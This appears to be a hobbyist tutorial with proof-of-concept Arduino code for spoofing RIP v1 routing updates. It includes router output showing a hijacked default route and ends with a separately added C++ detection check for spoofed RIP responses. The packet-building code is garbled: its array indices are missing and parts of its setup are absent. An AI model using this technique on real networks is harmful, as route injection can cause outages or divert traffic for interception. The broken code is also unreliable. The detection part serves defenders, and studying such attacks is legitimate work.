This is a quick Instructable with some proof-of-concept code to show that routing protocols can be spoofed using an Arduino. It also serves as a quick introduction to using the Ethernet shield and gets your Arduino sending packets!
RIP v1 is an early routing protocol. Routing protocols are used to exchange information between routers on the internet or private networks. The information exchanged contains details of known networks that the sending router has access to. This is how routers learn and share information about new routes to new networks.
If this information is spoofed or altered, it can cause unexpected behaviour within a network or cause a Denial of Service. This is purely a proof of concept and is not meant for such purposes.
Things you need:
- Ethernet Shield
- Router running RIP for testing
- Optional LCD screen
Step 1: Connect the Shield and Screen
The first step is to connect the physical equipment.
Mount the shield and connect it to your network.
Wire up an LCD screen if you want to.
I have used the following pins for the LCD:
Step 2: Upload the Code!
memset(packetBuffer, 0, packetSize); // erase the contents of packetBuffer
packetBuffer = 0x2; // RIP command type of response
packetBuffer= 0x1; // Define which version of RIP to use: RIP v1
packetBuffer = 0x0; // bytes of padding
packetBuffer= 0x0;
packetBuffer= 0x0;
packetBuffer = 0x02;
packetBuffer= 0xC0; // first octet of network ID to spoof 0xC0 = 192 in decimal, this could be any network you want to advertise
packetBuffer=0x00; // metric for the route, the lower the metric the more favourable it is
Udp.write(packetBuffer,packetSize);
Udp.endPacket(); // note the packet isn’t actually sent until you call endPacket().
Step 3: See the Results
A great tool for checking what is actually going on is Wireshark. Download this here:
This will show what packets are being transmitted for the whole network. Watch the video to see traffic before the spoofer starts and after. You can see the Arduino is sending numerous RIP v1 Response packets to the network broadcast address. Any router on the network will add this advertised route to its routing table.
Here is a Cisco router that has had its default route replaced by the Arduino. It will now forward all traffic for networks that it doesn't currently have a route for to the Arduino.
Router#show ip route
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 192.168.1.133 to network 0.0.0.0

R    192.0.0.0/24 [120/1] via 192.168.1.133, 00:02:54, FastEthernet0
C    192.168.1.0/24 is directly connected, FastEthernet0
C    192.168.2.0/24 is directly connected, Tunnel0
R*   0.0.0.0/0 [120/1] via 192.168.1.133, 00:00:00, FastEthernet0
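To spot the kind of change shown in the routing table above from the monitoring side, the check below inspects a captured RIP v1 payload (UDP port 520) and flags responses from hosts that are not known routers, default-route advertisements and invalid metrics. It is an added example, not code from the original Instructable; the function name, the flag names, the allow-list address 192.168.1.1 and the sample bytes are assumptions constructed for illustration.

```cpp
#include <cstdint>
#include <cstddef>
#include <cstdio>

// Findings for one RIP v1 datagram (UDP port 520 payload), OR-ed together.
enum : unsigned {
    RIP_OK = 0,
    RIP_MALFORMED     = 1u << 0,  // bad length, version, header padding or address family
    RIP_UNTRUSTED_SRC = 1u << 1,  // response from a host not on the router allow-list
    RIP_DEFAULT_ROUTE = 1u << 2,  // advertises 0.0.0.0 (candidate default route)
    RIP_BAD_METRIC    = 1u << 3   // metric outside 1..16
};

static uint32_t be32(const uint8_t *p) {
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

// src: sender IPv4 address; trusted: allow-list of legitimate RIP routers (assumed known).
unsigned inspect_rip_v1(const uint8_t *pl, size_t len, uint32_t src,
                        const uint32_t *trusted, size_t ntrusted) {
    // RFC 1058 layout: 4-byte header, then 1..25 route entries of 20 bytes each.
    if (len < 24 || len > 504 || (len - 4) % 20 != 0) return RIP_MALFORMED;
    if (pl[1] != 1 || pl[2] || pl[3]) return RIP_MALFORMED;  // version 1, zero padding
    if (pl[0] != 2) return RIP_OK;          // only responses (command 2) are route updates
    unsigned flags = RIP_UNTRUSTED_SRC;
    for (size_t i = 0; i < ntrusted; i++)
        if (trusted[i] == src) flags = RIP_OK;
    for (const uint8_t *e = pl + 4; e < pl + len; e += 20) {
        uint32_t metric = be32(e + 16);
        if (e[0] != 0 || e[1] != 2) flags |= RIP_MALFORMED;  // address family must be 2 (IP)
        if (be32(e + 4) == 0) flags |= RIP_DEFAULT_ROUTE;
        if (metric < 1 || metric > 16) flags |= RIP_BAD_METRIC;
    }
    return flags;
}

// Constructed sample payload: one-entry response for 0.0.0.0 with metric 1.
static const uint8_t SAMPLE_DEFAULT_ROUTE[24] = {
    2, 1, 0, 0,  0, 2, 0, 0,  0, 0, 0, 0,
    0, 0, 0, 0,  0, 0, 0, 0,  0, 0, 0, 1 };

int main() {
    const uint32_t routers[] = {0xC0A80101};  // 192.168.1.1, assumed legitimate router
    // Sender 192.168.1.133 is not on the allow-list.
    printf("flags=0x%x\n",
           inspect_rip_v1(SAMPLE_DEFAULT_ROUTE, 24, 0xC0A80185, routers, 1));
    return 0;
}
```

RIP v1 carries no authentication, so the allow-list of sender addresses is only a detection aid: a source address can itself be forged.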
The next idea is to attempt OSPF spoofing, but this will be much more difficult as it's a much more complicated protocol and can actually be authenticated, etc.
Any questions please ask :)